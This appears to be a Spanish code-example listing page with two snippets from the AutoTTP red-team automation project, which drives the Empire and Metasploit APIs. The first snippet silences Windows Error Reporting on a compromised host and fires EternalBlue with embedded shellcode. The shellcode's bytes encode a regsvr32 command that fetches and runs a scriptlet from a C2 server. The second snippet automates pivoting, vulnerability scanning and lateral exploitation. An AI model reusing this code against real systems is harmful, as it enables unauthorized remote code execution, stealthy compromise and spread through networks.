Ejemplos de empireAPI en Python

Lenguaje de programación: Python

Namespace/Package Name: EmpireAPIWrapper

Método / Función: empireAPI

Ejemplos en hotexamples.com: 2

Python empireAPI - 2 ejemplos encontrados. Estos son los ejemplos en Python del mundo real mejor valorados de EmpireAPIWrapper.empireAPI extraídos de proyectos de código abierto. Puedes valorar ejemplos para ayudarnos a mejorar la calidad de los ejemplos.

Ejemplo n.º 1

Mostrar archivo

Archivo: empire_localEternalBlue.py Proyecto: zshell/AutoTTP

        return None
    # Suppress WER error UI to make it "silent"
    opts = {
        'Agent':
        agent_name,
        'command':
        """Set-ItemProperty -Path "Registry::HKEY_CURRENT_USER\Software\Microsoft\Windows\Windows Error Reporting" -Name DontShowUI -Value 1"""
    }
    results = API.agent_run_shell_cmd_with_result(agent_name, opts)
    # Fire EternalBlue from Empire which is basically the same Invoke-EternalBlue
    # will most likely crash remove target
    opts = exploitation.exploit_eternalblue.options
    target_ip = API.agent_info(agent_name)['agents'][0]['internal_ip']
    param = {
        opts.required_agent: agent_name,
        opts.required_initialgrooms: 12,
        opts.required_maxattempts: 1,
        opts.required_shellcode: shellcode,
        opts.required_target: target_ip
    }
    API.module_exec(exploitation.exploit_eternalblue.path, param)
    return "launched externalblue! Pls wait for agent..."


if __name__ == '__main__':  # unit test
    API = empireAPI(EMPIRE_SERVER, uname=EMPIRE_USER, passwd=EMPIRE_PWD)
    # used msfvenom -p windows/x64/exec CMD="regsvr32... launcher.sct scrobj.dll" -f powershell
    # tried a larger shellcode that does powershell with base64 payload.. crashed target
    # nice integration will be to precede this technique with execution of metasploit msfvenom
    shellcode = "0xfc,0x48,0x83,0xe4,0xf0,0xe8,0xc0,0x0,0x0,0x0,0x41,0x51,0x41,0x50,0x52,0x51,0x56,0x48,0x31,0xd2,0x65,0x48,0x8b,0x52,0x60,0x48,0x8b,0x52,0x18,0x48,0x8b,0x52,0x20,0x48,0x8b,0x72,0x50,0x48,0xf,0xb7,0x4a,0x4a,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x2,0x2c,0x20,0x41,0xc1,0xc9,0xd,0x41,0x1,0xc1,0xe2,0xed,0x52,0x41,0x51,0x48,0x8b,0x52,0x20,0x8b,0x42,0x3c,0x48,0x1,0xd0,0x8b,0x80,0x88,0x0,0x0,0x0,0x48,0x85,0xc0,0x74,0x67,0x48,0x1,0xd0,0x50,0x8b,0x48,0x18,0x44,0x8b,0x40,0x20,0x49,0x1,0xd0,0xe3,0x56,0x48,0xff,0xc9,0x41,0x8b,0x34,0x88,0x48,0x1,0xd6,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x41,0xc1,0xc9,0xd,0x41,0x1,0xc1,0x38,0xe0,0x75,0xf1,0x4c,0x3,0x4c,0x24,0x8,0x45,0x39,0xd1,0x75,0xd8,0x58,0x44,0x8b,0x40,0x24,0x49,0x1,0xd0,0x66,0x41,0x8b,0xc,0x48,0x44,0x8b,0x40,0x1c,0x49,0x1,0xd0,0x41,0x8b,0x4,0x88,0x48,0x1,0xd0,0x41,0x58,0x41,0x58,0x5e,0x59,0x5a,0x41,0x58,0x41,0x59,0x41,0x5a,0x48,0x83,0xec,0x20,0x41,0x52,0xff,0xe0,0x58,0x41,0x59,0x5a,0x48,0x8b,0x12,0xe9,0x57,0xff,0xff,0xff,0x5d,0x48,0xba,0x1,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x48,0x8d,0x8d,0x1,0x1,0x0,0x0,0x41,0xba,0x31,0x8b,0x6f,0x87,0xff,0xd5,0xbb,0xf0,0xb5,0xa2,0x56,0x41,0xba,0xa6,0x95,0xbd,0x9d,0xff,0xd5,0x48,0x83,0xc4,0x28,0x3c,0x6,0x7c,0xa,0x80,0xfb,0xe0,0x75,0x5,0xbb,0x47,0x13,0x72,0x6f,0x6a,0x0,0x59,0x41,0x89,0xda,0xff,0xd5,0x72,0x65,0x67,0x73,0x76,0x72,0x33,0x32,0x2e,0x65,0x78,0x65,0x20,0x2f,0x73,0x20,0x2f,0x75,0x20,0x2f,0x6e,0x20,0x2f,0x69,0x3a,0x68,0x74,0x74,0x70,0x3a,0x2f,0x2f,0x65,0x6d,0x70,0x69,0x72,0x65,0x63,0x32,0x3a,0x38,0x30,0x30,0x30,0x2f,0x6c,0x2e,0x73,0x63,0x74,0x20,0x73,0x63,0x72,0x6f,0x62,0x6a,0x2e,0x64,0x6c,0x6c,0x0"
    print(run(API, API.agents()['agents'][0]['name'], shellcode))

Ejemplo n.º 2

Mostrar archivo

Archivo: lateral_RCE_example.py Proyecto: Cloudxtreme/AutoTTP

2. Start MSF autoroute on pivot node
3. Do a vulnerable (to EternalBlue) target(s) scan
4. Launch EternalBlue thru pivot to adjacent target
5. Wait for Empire session from earlier step
"""
from c2_settings import *
from EmpireAPIWrapper import empireAPI
from pymetasploit.msfrpc import MsfRpcClient
from stage2.external_c2 import msf_wait_for_session, empire_wait_for_agent, msf_get_timestamp, empire_get_timestamp
from stage3.internal_reconn.windows import msf_eternalblue_scan
from stage3.internal_c2.windows import msf_autoroute
from stage3.escalate_privilege.windows import msf_eternal_blue

# Set both API instances for MSF & Empire
msf_API = MsfRpcClient(MSF_PWD, server=MSF_SERVER,ssl=False)
empire_API = empireAPI(EMPIRE_SERVER, uname=EMPIRE_USER, passwd=EMPIRE_PWD)

# Step 1 - Wait for pivot
msf_session_id = msf_wait_for_session.run(msf_API)
t = msf_get_timestamp.run(msf_API,msf_session_id)
print(t + ' Got a meterpreter session ' + str(msf_session_id))

# Step 2 - Setup autoroute on pivot
pivot_range = ''
routes = msf_autoroute.run(msf_API, msf_session_id)
t = msf_get_timestamp.run(msf_API,msf_session_id)
print(t + 'Added route(s): ' + str(routes))
for r in routes:
    if '255.255.255.0' in r: # 1-254 takes a long time to scan
        pivot_range = r.replace('.0/255.255.255.0','.100-210') 
        break # assume 1 class C network in test environment